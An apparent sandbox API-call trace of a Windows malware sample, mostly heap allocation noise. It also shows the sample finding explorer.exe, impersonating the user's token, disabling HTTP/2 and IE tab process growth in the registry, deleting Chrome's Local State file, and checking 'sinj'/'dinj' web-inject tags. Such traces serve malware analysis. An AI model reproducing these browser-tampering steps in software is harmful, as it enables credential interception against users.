	[0188.438] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0xf0) returned 0x15c
	[0188.438] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0
	[0188.438] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0188.439] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x270) returned 0x160
	[0188.439] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="explorer.exe") returned 0x0
	[0188.439] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0188.440] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x500) returned 0x164
	[0188.440] StrStrIA (lpFirst="sppsvc.exe", lpSrch="explorer.exe") returned 0x0
	[0188.440] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0188.440] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x7b8) returned 0x168
	[0188.441] StrStrIA (lpFirst="dwm.exe", lpSrch="explorer.exe") returned 0x0
	[0188.441] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0188.441] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x61c) returned 0x16c
	[0188.441] StrStrIA (lpFirst="explorer.exe", lpSrch="explorer.exe") returned="explorer.exe"
	[0188.441] CloseHandle (hObject=0x10c) returned 1
	[0188.442] CloseHandle (hObject=0x16c) returned 1
	[0188.442] ProcessIdToSessionId (in: dwProcessId=0x61c, pSessionId=0x1009158c | out: pSessionId=0x1009158c) returned 1
	[0188.442] WTSQueryUserToken (SessionId=0x1, phToken=0x1df928*=0x0) returned 1
	[0188.446] DuplicateToken (in: ExistingTokenHandle=0x178, ImpersonationLevel=0x2, DuplicateTokenHandle=0x1df924 | out: DuplicateTokenHandle=0x1df924*=0x17c) returned 1
	[0188.446] ImpersonateLoggedOnUser (hToken=0x17c) returned 1
	[0188.446] GetUserNameA (in: lpBuffer=0x1df818, pcbBuffer=0x1df920 | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x1df920) returned 1
	[0188.447] RegDisablePredefinedCacheEx () returned 0x0
	[0188.447] RegCreateKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", phkResult=0x1df92c | out: phkResult=0x1df92c*=0x108) returned 0x0
	[0188.447] RegSetValueExA (in: hKey=0x108, lpValueName="EnableHTTP2", Reserved=0x0, dwType=0x4, lpData=0x1df928*=0x0, cbData=0x4 | out: lpData=0x1df928*=0x0) returned 0x0
	[0188.448] RegCloseKey (hKey=0x108) returned 0x0
	[0188.448] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0188.448] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df8e0 | out: phkResult=0x1df8e0*=0x38) returned 0x0
	[0188.450] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0188.450] RegSetValueExA (in: hKey=0x38, lpValueName="TabProcGrowth", Reserved=0x0, dwType=0x4, lpData=0x1df8dc*=0x0, cbData=0x4 | out: lpData=0x1df8dc*=0x0) returned 0x0
	[0188.451] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0188.451] RegCloseKey (hKey=0x38) returned 0x0
	[0188.451] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x1df7c0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Local") returned 1
	[0188.461] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x279f68
	[0188.461] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x287a78
	[0188.461] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279f68 | out: hHeap=0x260000) returned 1
	[0188.461] DeleteFileA (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\local state")) returned 1
	[0188.514] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x287a78 | out: hHeap=0x260000) returned 1
	[0188.514] RevertToSelf () returned 1
	[0188.514] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x13600) returned 0x28b3f0
	[0188.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1000f4d4, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x10090ab0 | out: lpThreadId=0x10090ab0*=0xa3c) returned 0x38
	[0188.526] GetExitCodeThread (in: hThread=0x38, lpExitCode=0x1dfb64 | out: lpExitCode=0x1dfb64) returned 1
	[0188.526] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x10002ce8, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x10090aa4 | out: lpThreadId=0x10090aa4*=0x670) returned 0x184
	[0188.526] GetProcessHeap () returned 0x260000
	[0188.526] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2c) returned 0x279f68
	[0188.526] ResetEvent (hEvent=0x8) returned 1
	[0188.526] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0191.412] lstrcmpA (lpString1="sinj", lpString2="dinj") returned 1
	[0191.412] lstrcmpA (lpString1="dinj", lpString2="dinj") returned 0
	[0191.412] GetProcessHeap () returned 0x260000
	[0191.412] HeapValidate (hHeap=0x260000, dwFlags=0x0, lpMem=0x0) returned 1
	[0191.412] GetProcessHeap () returned 0x260000
	[0191.412] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x260000) returned 1
	[0191.412] GetProcessHeap () returned 0x260000
	[0191.412] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2056c) returned 0x2a0f88
	[0191.414] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20593) returned 0x2c1500
	[0191.416] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20593) returned 0x2e1aa0
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a0) returned 0x29fcc0
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a0) returned 0x302040
	[0191.418] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fcc0 | out: hHeap=0x260000) returned 1
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a0) returned 0x29fcc0
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x29fe68
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x2892d8
	[0191.418] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fe68 | out: hHeap=0x260000) returned 1
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x289360
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x279fd8
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a010
	[0191.418] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279fd8 | out: hHeap=0x260000) returned 1
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x279fd8
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a048
	[0191.418] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279fd8 | out: hHeap=0x260000) returned 1
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x279fd8
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a080
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0b8
	[0191.418] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a080 | out: hHeap=0x260000) returned 1
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.418] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a080
	[0191.418] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0b8 | out: hHeap=0x260000) returned 1
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29ec08
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0b8
	[0191.418] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a080 | out: hHeap=0x260000) returned 1
	[0191.418] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a080
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x29fe68
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0f0
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x3021e8
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a128
	[0191.418] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a160
	[0191.418] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a080 | out: hHeap=0x260000) returned 1
	[0191.418] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0b8 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279fd8 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a048 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a010 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x289360 | out: hHeap=0x260000) returned 1
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x289360
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x289360 | out: hHeap=0x260000) returned 1
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x289360
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a010
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a048
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a010 | out: hHeap=0x260000) returned 1
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a010
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x279fd8
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a010 | out: hHeap=0x260000) returned 1
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a010
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286820
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29ec08
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286820 | out: hHeap=0x260000) returned 1
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x302250
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286820
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc0) returned 0x3022d8
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286820 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302250 | out: hHeap=0x260000) returned 1
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0b8
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x100) returned 0x3023a0
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a080
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29ec08
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a198
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a128 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3021e8 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0f0 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fe68 | out: hHeap=0x260000) returned 1
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0f0
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa0) returned 0x29fe68
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286820
	[0191.419] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a128
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0b8 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.419] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3022d8 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a010 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279fd8 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a048 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x289360 | out: hHeap=0x260000) returned 1
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x289360
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x289360 | out: hHeap=0x260000) returned 1
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x289360
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a048
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x279fd8
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a048 | out: hHeap=0x260000) returned 1
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a048
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a010
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a048 | out: hHeap=0x260000) returned 1
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a048
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0b8
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a1d0
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0b8 | out: hHeap=0x260000) returned 1
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0b8
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a1d0 | out: hHeap=0x260000) returned 1
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x3021e8
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a1d0
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0b8 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0b8
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x180) returned 0x3024a8
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a208
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x302250
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a240
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a278
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa0) returned 0x3022b8
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a198 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a080 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286820 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fe68 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0f0 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3023a0 | out: hHeap=0x260000) returned 1
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0f0
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29ec08
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a080
	[0191.420] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a198
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0b8 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a1d0 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3021e8 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a048 | out: hHeap=0x260000) returned 1
	[0191.420] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a010 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x279fd8 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x289360 | out: hHeap=0x260000) returned 1
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x2859b8
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x180) returned 0x302630
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x279fd8
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x3021e8
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a010
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a048
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a1d0
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa0) returned 0x29fe68
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286820
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0b8
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a2b0
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x289360
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a2e8
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a320
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2892d8 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fcc0 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a160 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a240 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302250 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a208 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a128 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3022b8 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a278 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a198 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a080 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0f0 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3024a8 | out: hHeap=0x260000) returned 1
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x260) returned 0x302250
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x26f) returned 0x3027b8
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302040 | out: hHeap=0x260000) returned 1
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302250 | out: hHeap=0x260000) returned 1
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x260) returned 0x302250
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x150) returned 0x3024b8
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x140) returned 0x302040
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3024b8 | out: hHeap=0x260000) returned 1
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x140) returned 0x3024b8
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286870
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a0f0
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a080
	[0191.421] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a0f0 | out: hHeap=0x260000) returned 1
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286910
	[0191.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286938
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286910 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274918
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868e8 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868e8
	[0191.422] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286938 | out: hHeap=0x260000) returned 1
	[0191.422] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x29ec08
